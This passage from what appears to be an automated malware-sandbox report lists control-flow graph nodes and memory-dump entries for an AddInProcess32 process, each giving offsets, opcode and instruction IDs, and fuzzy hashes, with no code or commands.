1103->1111 1105 5e0fd3-5e0fd5 1104->1105 1106 5e0fd1 1104->1106 1105->1103 1106->1103 1111->1098 1118->1111 1121->1089 1124 5e0f31-5e0f37 1121->1124 1124->1087
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: &55p
                                            • API String ID: 0-1955183375
                                            • Opcode ID: b06b8d83fa8cf4bdf1eba7a25edfd46ce03592cbf07d7c864df3dc2c6dd0498e
                                            • Instruction ID: 3e047952d4dd8f561919aa32b5ebddf2a8ac3b73e65ed0b27116a5e8c6749929
                                            • Opcode Fuzzy Hash: b06b8d83fa8cf4bdf1eba7a25edfd46ce03592cbf07d7c864df3dc2c6dd0498e
                                            • Instruction Fuzzy Hash: A7817F30A00245CFDB19EF65C5847AEBBB6FF98300F648529E1419B399DB75EC82CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1125 5e48b1-5e48c7 1126 5e48c9-5e48cc 1125->1126 1127 5e48ce-5e48e3 1126->1127 1128 5e48e8-5e48eb 1126->1128 1127->1128 1129 5e48ed-5e4907 call 5e4980 1128->1129 1130 5e4925-5e4927 1128->1130 1138 5e490d-5e4920 1129->1138 1132 5e492e-5e4931 1130->1132 1133 5e4929 1130->1133 1132->1126 1135 5e4933-5e4938 1132->1135 1133->1132 1138->1130
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $9:
                                            • API String ID: 0-143483686
                                            • Opcode ID: bd5a30eef85148cbb8022000f5489cc3e4ad6be655fa5dcceca4092d4a79f151
                                            • Instruction ID: 75b2df0170827d6e47b2e0a0a5f7380fa3a45d8f601356a78aa5ed0908f912c1
                                            • Opcode Fuzzy Hash: bd5a30eef85148cbb8022000f5489cc3e4ad6be655fa5dcceca4092d4a79f151
                                            • Instruction Fuzzy Hash: 310144357046940FCB2A677AA84226E7F96DFC3310F040CBAF0C6CF251CA549E068B54
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e740cca0d253e4434ec08c1704c97a744d22ada1e534fae146c04486e07e1e5
                                            • Instruction ID: 30568ab497393064e40418a858829d24de6983977d39f2836953436d68f5647a
                                            • Opcode Fuzzy Hash: 2e740cca0d253e4434ec08c1704c97a744d22ada1e534fae146c04486e07e1e5
                                            • Instruction Fuzzy Hash: 56811431B002548FCF18AF75D4953AE7BA6FBC9320F20486AE546DB385DB35DD428B94
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fccce43a5dea477c158640967390fb9524d8874fbae2a21c72df5758f0ccb963
                                            • Instruction ID: 0bdaa9ebdb5b70f972b08420cf86a9288379275502e3916b883bd679de93762f
                                            • Opcode Fuzzy Hash: fccce43a5dea477c158640967390fb9524d8874fbae2a21c72df5758f0ccb963
                                            • Instruction Fuzzy Hash: 47914130B002159FDB64DF65C8957AE77F6BFC5300F20846AE949EB388EB71AD418B91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7ac71c497ef102e1160c06a6f80f36e601768a5e3fe860a1cba5a64cf69af4d
                                            • Instruction ID: 08f39d4ed79c5df514781d7f53a24c0ce0cd7ed6e727d9633444f27fbb80788f
                                            • Opcode Fuzzy Hash: f7ac71c497ef102e1160c06a6f80f36e601768a5e3fe860a1cba5a64cf69af4d
                                            • Instruction Fuzzy Hash: CD5141307002449FDB54EF65D8A6B6E7BE6FFC4300F10846AE949DB388EB71AD418B95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 923cf770763a5cfd9f447c9ec68fdce15adcb2f8600e86e8ac3bc7c7261ef1d3
                                            • Instruction ID: ce24f97e500de92bd2c45a557a79f63caaff72c11b700bc96f24db876fe7c2c7
                                            • Opcode Fuzzy Hash: 923cf770763a5cfd9f447c9ec68fdce15adcb2f8600e86e8ac3bc7c7261ef1d3
                                            • Instruction Fuzzy Hash: A121D331B002189FDB08DB6AE45479EBBB7FB95310F148436E445EB382D771AD418B80
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.625746295.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_13d000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5764ab92c129c77cbb8e798e6414cad51f62492f89f80e7547f726b4937026e
                                            • Instruction ID: 9cc2b925f36a3408b3d289ce1bee96e671aec012a0e12cfe43f8a1bc6175a6b2
                                            • Opcode Fuzzy Hash: f5764ab92c129c77cbb8e798e6414cad51f62492f89f80e7547f726b4937026e
                                            • Instruction Fuzzy Hash: A321D475604240EFEB18CF24F8C4B16BB65EB84B14F34C569E8494B246C33AD847CBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3da06fb08305362189a5b1ba29f0d3748a0d06c14ecbe7a925531c5aca217f34
                                            • Instruction ID: f4af511646625c9f0ef1f631e58e22dc3ed2d8d2f82fa93f7ce18486a9f580e2
                                            • Opcode Fuzzy Hash: 3da06fb08305362189a5b1ba29f0d3748a0d06c14ecbe7a925531c5aca217f34
                                            • Instruction Fuzzy Hash: 72211934A00289CFCB18DBA5D684AAEBBB2FF88311F248115D955A7355E731ECC2CF40
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.625746295.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_13d000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68e1aa16009c29124b19866519b963363fbe3a70e25f1be76005680992e83943
                                            • Instruction ID: d871dea743105e443430f031e21e2595db02dc2169cc50416c2977637125661e
                                            • Opcode Fuzzy Hash: 68e1aa16009c29124b19866519b963363fbe3a70e25f1be76005680992e83943
                                            • Instruction Fuzzy Hash: DE217F755083809FCB06CF24E994B15BFB1EB46714F28C5DAD8498F266C33AD85ACB62
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 539ae9d873f06c53fa05868534215c64bcd4328ad285d24efb3b486fe0d33c0b
                                            • Instruction ID: ad0b48a2e897578c0cac212639164e9cfc375db343dcf649725ac2bfe9abad3e
                                            • Opcode Fuzzy Hash: 539ae9d873f06c53fa05868534215c64bcd4328ad285d24efb3b486fe0d33c0b
                                            • Instruction Fuzzy Hash: 62114931700664DBCF2C9EA6D9C16AA7BADFB85310F104835EA80DB240FB71ED01C798
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29b8247ecccae9171bbfe88bb58f42c3bbf1abe3545863483ffd406e470cdfcb
                                            • Instruction ID: 4fc7f7404d999db2ad31f774df3ec4b44d79c678928e61e7626421c82772ed4c
                                            • Opcode Fuzzy Hash: 29b8247ecccae9171bbfe88bb58f42c3bbf1abe3545863483ffd406e470cdfcb
                                            • Instruction Fuzzy Hash: C201D4307042505FC725DB399DA876E7BE6EBD7304F10846AE14ACB351EA29DE028781
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.626840418.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_5e0000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfee4bd4ecfd73e1f9d66fa5521e25e02ed0d7c64e3fa9e14580c9698c88b815
                                            • Instruction ID: 01fcb9809ec0e37d6e2bdd86fc4dae899ecd6b1ca873840e5167093eef1abf4d
                                            • Opcode Fuzzy Hash: cfee4bd4ecfd73e1f9d66fa5521e25e02ed0d7c64e3fa9e14580c9698c88b815
                                            • Instruction Fuzzy Hash: 4501D1307005141FCB28EB39DD9976F77DAEBC6350F108839E24ACB344EA25ED024780